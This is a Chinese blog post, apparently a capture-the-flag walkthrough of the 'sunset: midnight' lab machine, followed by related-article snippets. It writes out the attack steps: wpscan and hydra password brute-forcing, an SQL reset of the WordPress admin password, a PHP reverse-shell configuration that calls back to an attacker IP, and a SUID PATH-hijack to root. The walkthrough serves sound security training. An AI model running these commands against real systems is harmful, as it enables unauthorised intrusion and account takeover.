vulhub-sunset: midnight

最新推荐文章于 2024-09-23 18:46:25 发布
最新推荐文章于 2024-09-23 18:46:25 发布
阅读量673 收藏 15
点赞数 6
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75378806/article/details/138604296
版权

常规端口扫描

开放 22、80、3306端口 根据信息可以看出 在80端口上搭建了WordPress

wpscan --url http://sunset-midnight/ --enumerate u

得到名为 admin 的用户

接下来试着爆破密码

wpscan --url http://sunset-midnight/ -U admin -P /usr/share/wordlists/rockyou.txt

爆破不出来

msql渗透(改密码)

mysql空密码尝试不行

爆破一下试试

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.217.172

得到密码 robert

mysql -h192.168.217.172 -u root -p

show database;

use wordpress_db;

show tables;

select * from users;

密码为加密过的

由于有mysql权限1

使用 update 更新密码,密码为123456

update wp_users set user_pass=md5(“123456”) where user_login=‘admin’;

wordpress后台反弹shell

登入wordpress后台

利用plugin edditor

编辑 /usr/share/webshells/php/php-reverse-shell.php

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.217.168';  // CHANGE THIS
$port = 2233;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

更改IP为 kali 的IP port为监听的端口接下来将更改完成的代码复制到插件内容里

提权

完成后点击 Activate 即可得到反弹的shell

ssh jose@192.168.217.172

find / -perm -u=s -type f 2>/dev/null

发现status命令不太常见,执行一下

看到status使用了service命令,但是为未使用service的绝对路径,所以可以尝试更改$PATH来执行该文件

cd /tmp

echo "/bin/bash" > service

chmod 777 service

echo $PATH

export PATH=/tmp:$PATH #将/tmp添加到环境变量中

status

就是status执行了server,但是没有用绝对路径,我们可以创建一个server文件,并且写入/bin/bash,将其加入环境变量,而status执行时会去找环境变量的最前面的就是我们设置的创建的server文件即可提权root

kikifofo
关注
SUNSET: MIDNIGHT靶机
logan_logan的博客
07-22 471
1.浏览器输入地址打开网页;
sundown-sunset:用于计算日落和日落时间的简单API
02-18
"sundown-sunset-master"可能包含测试用例,用来验证API在不同地理位置和日期下的正确性。开发者可以通过这些测试用例来确保API在各种情况下的表现。 在实际应用中,"sundown-sunset" API可以用于各种场景,如天气...
vulhub-sunset:dawn3
2201_75378806的博客
05-13 615
这台靶机的知识是win缓冲区溢出漏洞,本篇文章是按照b站红队笔记师傅视频学习的nmap 常规扫描,有个6812端口和21端口匿名登入ftp,下载dawn3.exefile,binwalk,strings先查看一下文件从输出中可以看到一些信息:PE32 是一种用于 32 位 Windows 操作系统的可执行文件格式"(console)" 表示这是一个控制台应用程序。
vulhub-sunset:decoy
2201_75378806的博客
05-09 677
常规端口扫描,有22,80。
vulhub-sunset:sundown
2201_75378806的博客
05-13 418
使用wpscan扫描,发现插件:wp-with-spritz(wp的插件也有爆出漏洞,平时渗透要注意)#创建自定义函数sys_exec 类型是integer,别名 soname 文件名(导入udf函数。goole搜搜漏洞该插件存在存在文件包含漏洞with Spritz 1.0 - 远程文件包含。读取一下wp-config文件,权限不够需要www-data网站权限,利用前面的文件包含。#将udf文件内容传入新建的udf文件中,这里的dumpfile要和查看的路劲一致。或者searchsploit。
vulhub-sunset:solstice
2201_75378806的博客
05-13 306
所以在网上找到apache2的访问日志可能保存的文件路径,挨个进行文件包含看看访问日志到底保存在哪里,最后发现在/var/log/apache2/access.log。由于这个php文件是由root运行的,并且我们有写权限,因此我们可以将文件的内容更改为恶意php代码,这将为我们提供反向shell。由于nmap扫描出80端口是apache httpd 2.4.38,可以试试apache日志中毒。我们将使用这个 php 代码来获取反向 shell,将 ip 更改为攻击者的 ip 并记住端口。
vulhub-Sunset:Twilight
2201_75378806的博客
05-09 162
指定了盐为 "a",最后的 "a" 是要加密的原始密码。先将原始原件下载到本地,方便有问题可以恢复。它还说我们对/passwd有写入权限。表示使用 MD5 加密算法,上传linpease。解密一下shadow。
vulnhub靶机-sunset:dusk
臭nana的博客
07-18 1064
1、获取靶机ip:192.168.0.127 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.127 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.127 Host is up (0.00097s latency). Not shown: 65529 closed ports PORT STATE SER
vulnhub靶机-sunset:dawn
臭nana的博客
07-16 1144
1、找到靶机ip:192.168.0.123 nmap 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.123 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.123 Host is up (0.0090s latency). Not shown: 65531 closed ports PORT STATE SERV
vulnhub靶机-sunset:1
臭nana的博客
07-15 1471
这个靶机比较容易,水一篇,后面接着写这个sunset系列 1、找到靶机ip:192.168.0.122 nmap -sn 192.168.0.0/24 2、扫描靶机端口 oot@kali:~# nmap -sn 192.168.0.0/24 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.1 Host is up (0.0016s latency). MAC Address: 8C:21:0A:BC
ember-initials:适用于Ember应用程序的高级头像生成器。 首字母:circled_M:,图像:sunset:,凹版:woman_light_skin_tone:和可爱:smiling_face_with_heart-eyes:所有您需要的用户个人资料!
04-25
Ember Initials是一个使用用户的姓名缩写,图像,凹版印刷或可爱的东西生成简单化身的程序包。 它绝对支持Ember 3.16(或更高版本)。 得益于高度可定制的界面,您可以定义默认值甚至设置后备。...
sunrise-sunset-map:PHP和ReactJS Sunrisesunset计算器。 Sunrisesunsetmap.com的源代码-Calculator source code
03-24
这是的源代码。 该网站最初建于2005年,甚至早于jQuery(当时IE6是主要的浏览器)。 它旨在在廉价的共享主机上运行。 直到最近,我还是将其搁置一旁,但现在已使用ReactJS和SCSS将其重建为现代标准,并使用Google...
Sunset-Animation-CSS:使用完整CSS制作的日落动画
03-19
在本项目"Sunset-Animation-CSS"中,开发者通过纯CSS技术实现了一段日落动画,这展示了CSS在创建动态视觉效果方面的强大能力。这个动画可能包括天空颜色的渐变、太阳缓慢落下以及云彩随风飘动等元素,为网页增添了一...
深入Android UI开发:从自定义View到高级布局技巧的全面学习资料
无尽的大道的专栏
09-20 821
什么是自定义View:了解自定义View的基本概念和重要性,为深入学习打下基础。高级UI技巧:探索高级UI设计的技巧,提升应用的视觉效果。UI总结:总结UI开发的关键点和最佳实践,为未来的项目开发提供指导。
Android Camera 预览角度和拍照保存图片角度相关
sinat_37429535的博客
09-23 1145
基于Android R(11)
MYSQL SWAP 内存 vm.swappiness
jnrjian的博客
09-20 940
关于 vm.swappiness 的困惑来自于这样一个事实:在较旧的 Red Hat 内核中,vm.swappiness 的值为 0 会导致最少量的交换以避免内存不足的情况。在较新的内核中(从 RHEL 内核 2.6.32-303 开始​​),值为 0 将完全禁用交换,但值为 1 将提供最少量的交换以避免内存不足的情况。在较旧的内核中,0 和 1 之间的实际差异并不大,但 1 是避免较新内核中出现 OOM 情况的安全设置(当然,假设有一些交换空间可用)。考虑到系统自动将未使用的页面交换到磁盘。
安卓数据存储——SharedPreferences
大风起兮云飞扬
09-21 504
1、sharedPreferences是Android的一个轻量级存储工具,采用的存储结构是key - value的键值对方式2、共享参数的存储介质是符合XML规范的配置文件。保存路径是:/data/data/应用包名/shared_prefs/文件名.xml。
使用Charles抓包Android App数据
最新发布
CYRUS STUDIO
09-23 593
分别点击 Web Proxy、Seure Web Proxy 和 SOCKS Proxy 设置一下Clash的地址和端口。把证书 push 到 /system/etc/security/cacerts(系统证书目录)比如这里得到的hash值为e4473cf9,把证书的文件名改为 e4473cf9.0。通过 ipconfg 或者打开【网络和Internet】找到电脑的 ip 地址。手机设置中打开【信任的凭据】【系统】可以看到已经有charles的证书了。电脑开启共享热点,手机连接热点并设置代理。
Midnight = 1/2(Sunrise - Sunset)java表示
05-25
假设Sunrise和Sunset是以毫秒为单位表示的时间戳,可以使用以下Java代码计算Midnight: ``` long sunrise = /* 用毫秒表示的日出时间戳 */; long sunset = /* 用毫秒表示的日落时间戳 */; long midnight = (sun...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值